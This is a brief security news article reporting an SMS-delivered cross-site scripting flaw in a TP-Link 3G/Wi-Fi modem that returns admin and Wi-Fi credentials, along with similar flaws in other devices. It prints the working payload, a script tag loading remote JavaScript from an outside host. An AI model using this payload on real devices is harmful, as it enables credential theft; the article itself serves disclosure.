You can now find Cyber Kendra on Google News | Telegram

TP-Link 3G/Wi-Fi Modem Spoke with Admin Login

A security researcher Jan Hörsch from German security firm Securai, have discovered an interesting security flaw on TP-Link product that gives admin login details in response for an simple but evil text message.

The vulnerability was an Cross Site Scripting (XSS) bug that can triggered by sending an SMS containing the following payload, <script src=//n.ms/a.js></script>


The device’s admin credentials can be retrieved by an attacker with a simple text message, the router replies with admin username, admin password, its SSID, and its login password.

Not only TP-Link, Panasonic BM ET200 retina scanner and a Startech modem are also prone to the same vulnerability and same exploit works smoothly.

This is not the first time for Hörsch. Earlier also he had done intensive research on IOT devices and found multiple vulnerabilities. With his findings he had also appeared at last Kaspersky Security Analyst Submit.

Currently, firm have fixed the issue and release the patch for it. Users can download the patched firmware from the download page.

Post a Comment

Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.